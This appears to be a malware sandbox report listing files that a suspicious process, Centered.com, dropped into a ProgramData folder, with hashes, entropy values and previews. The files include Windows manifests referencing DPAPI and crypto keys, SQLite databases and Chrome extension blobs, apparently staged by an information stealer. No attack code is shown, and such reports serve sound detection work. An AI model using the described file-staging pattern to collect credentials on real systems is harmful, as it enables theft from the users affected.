                                                                                                                                                                                                                                                                                      Size (bytes):2947
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.120077314818075
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
                                                                                                                                                                                                                                                                                      MD5:C7E301D9DD77A21C1CDBD73A63AF205C
                                                                                                                                                                                                                                                                                      SHA1:715D25AA0C06B2AD162F52A8DE06FB5040C389B1
                                                                                                                                                                                                                                                                                      SHA-256:239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
                                                                                                                                                                                                                                                                                      SHA-512:B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\BA1VAI

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1941
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.861537145678193
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:22e8v+phDgrcHreIg/0xJ9U3C0gcj0kqIg/0xJuX:22CphPHyx0ruS0N0kqx0rQ
                                                                                                                                                                                                                                                                                      MD5:6F0056EC818D4FC20158F3FF190D6D6A
                                                                                                                                                                                                                                                                                      SHA1:9E2108FE560CC2187395C5EED011559D201CE45D
                                                                                                                                                                                                                                                                                      SHA-256:2F9596801DBE57D73C292BE4F93BD0C05F6D0A44C7A45F5F03FDBE35993B7DEC
                                                                                                                                                                                                                                                                                      SHA-512:72C193919EC4402D430CCBCC4F9A9B25DC9AAECBCCAEE666EFE20DA4133964D2382F1090EEB8FB0A3073ACAA7825AF7A62B59447D29F912A19BD4C04CDDF1AD1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-CertificateAuthority-Enrollment-ServerUpgrade".. processorArchitecture="*".. version="1.0.0.0".. versionScope="nonSxS".. />.. <migration.. alwaysProcess="yes".. replacementSettingsVersionRange="0".. replacementVersionRange="6.1.*".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\Software\Microsoft\ADCS\CES [ConfigurationStatus]</pattern>.. </objectSet>.. </include>.. </rules>.. <rules context="System">.. <detects>.. <detect>.. Detection of CES. -

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\BSRIEK

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\D2NGDJ

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4814
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                                      MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                                      SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                                      SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                                      SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Cr24....t.........0.."0...*.H.............0.........,.*i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..*Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0...*.H.............0.........]......N..h...A..LY.*..%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..|3.....W*S2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&...*.."..}/9y%.....*..m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8....*.*.J5.Z.~....0.Lt|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\EUA1N7YM7

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\JWB1NY

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4533
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1021772201912805
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                                                                                                                                                                                                                                      MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                                                                                                                                                                                                                                      SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                                                                                                                                                                                                                                      SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                                                                                                                                                                                                                                      SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\KF3O89HVK

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\LX4WBA

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4814
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                                      MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                                      SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                                      SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                                      SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Cr24....t.........0.."0...*.H.............0.........,.*i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..*Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0...*.H.............0.........]......N..h...A..LY.*..%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..|3.....W*S2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&...*.."..}/9y%.....*..m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8....*.*.J5.Z.~....0.Lt|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\M790ZM

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2062
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.925445222257812
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
                                                                                                                                                                                                                                                                                      MD5:60145F68B1CF9440FA663820AE11CE4B
                                                                                                                                                                                                                                                                                      SHA1:10195A2926015E3024D769673E004AA60DFEC0A3
                                                                                                                                                                                                                                                                                      SHA-256:4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
                                                                                                                                                                                                                                                                                      SHA-512:55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="*".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\NGVAAI

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1065
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.96984082363901
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:p/o2e8ZF2YS+pg0cjh3N1LRMEF4wuSb3wuyBX0FCUK:22e8z2j+pgfZlMY4Qr0B2A
                                                                                                                                                                                                                                                                                      MD5:4DBFCA3B87A59186D2612A95CA2CD899
                                                                                                                                                                                                                                                                                      SHA1:4C84BD2D60CE789B44070CDDC296C09D2F52B1CC
                                                                                                                                                                                                                                                                                      SHA-256:2C229D8DA31E17FCEF244A8A2029CA8FE8374738A9ECBFED9E23FB89DB8DF059
                                                                                                                                                                                                                                                                                      SHA-512:704ECDBE3FC38AC3807946072C7C523C36B4AF1586BEFE01A87BBBF35CF20214A0E0DE892A56E74FE8AA806154D7D2B9CC7028AEF47BEC326564B5F18CD12421
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-OneCore-TetheringService".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. replacementSettingsVersionRange="0".. settingsVersion="1".. alwaysProcess="Yes".. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Roaming\*[*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Settings\*[*]</pattern>.. </objectSet>.. </include>.. </rules>..

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\O8Q1DJ

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3019
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.884926762491409
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:22e8z2j+YgfH0LeIg6aFnJmINGbYgaFnQ7sPvh27+QgL7sYN2b4waFnw+:22X2qD0SPJv1/Pvh2S/pVN
                                                                                                                                                                                                                                                                                      MD5:63F04FB9936532B21E616E88E3EBED14
                                                                                                                                                                                                                                                                                      SHA1:56CEC96A0D4B10C6FC28C726B76BEF278CBC512F
                                                                                                                                                                                                                                                                                      SHA-256:61C5B3D0FD4051236AD00A0A39BE2F75F7E0DEC2AFBFF85617AED19AEF3FC650
                                                                                                                                                                                                                                                                                      SHA-512:66FF4756CE723378126DC6C1EC493B665D08387B3305A97ED9A80500CCCE6001DFB7F8957E8246C7C572D0362DA49EEC7AF8451B849F9E0E89FD8E14041CE75D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Extensible-Authentication-Protocol-Host-Service".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0".. replacementVersionRange="6.0-6.1.7150".. scope="Upgrade,MigWiz,USMT".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Methods\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Configuration\

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\PH4EU3

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4309
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.059776328378613
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:22CBzmeQiHRAQgXx9QgXcOaBIpghKkQlwYBwkbsgo9:MmCZy7BhA
                                                                                                                                                                                                                                                                                      MD5:3A9306662FE93D09B05B9AE44128BCF1
                                                                                                                                                                                                                                                                                      SHA1:77A917FFE8FF0EAAD8F3D3B764836C810E4C9DF5
                                                                                                                                                                                                                                                                                      SHA-256:1988183ECBC3C6987DA9CB598C78B52D7563D995FA94D1E91E0470392E765374
                                                                                                                                                                                                                                                                                      SHA-512:DA1F2776E8D1E08076032365B0D463DC847A31C6C360181D9966488455E878C7738DEC6F2B39153B2A410E3BEB73A05EB524593D125077273343740826A7B9F9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-dpapi-keys".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. scope="Upgrade,MigWiz,USMT,Data".. settingsVersion="1".. replacementSettingsVersionRange="0" .. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect [CREDHIST]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect\* [Preferred]</pattern>.. </objectSet>.. </include>.. <merge script="MigXmlHelper.DestinationPriority()">.. <objectSet>..

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\PHDJ5F

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):294912
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08441928760034874
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
                                                                                                                                                                                                                                                                                      MD5:2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
                                                                                                                                                                                                                                                                                      SHA1:14DFBE9B28D033542357D98005239D842A16FCFD
                                                                                                                                                                                                                                                                                      SHA-256:91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
                                                                                                                                                                                                                                                                                      SHA-512:DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\PZMGDJ

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):8193
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.027484893998515
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
                                                                                                                                                                                                                                                                                      MD5:2D6ACF2AEC5E5349B16581C8AE23BF3E
                                                                                                                                                                                                                                                                                      SHA1:0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
                                                                                                                                                                                                                                                                                      SHA-256:B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
                                                                                                                                                                                                                                                                                      SHA-512:7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\SRQ9HL

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
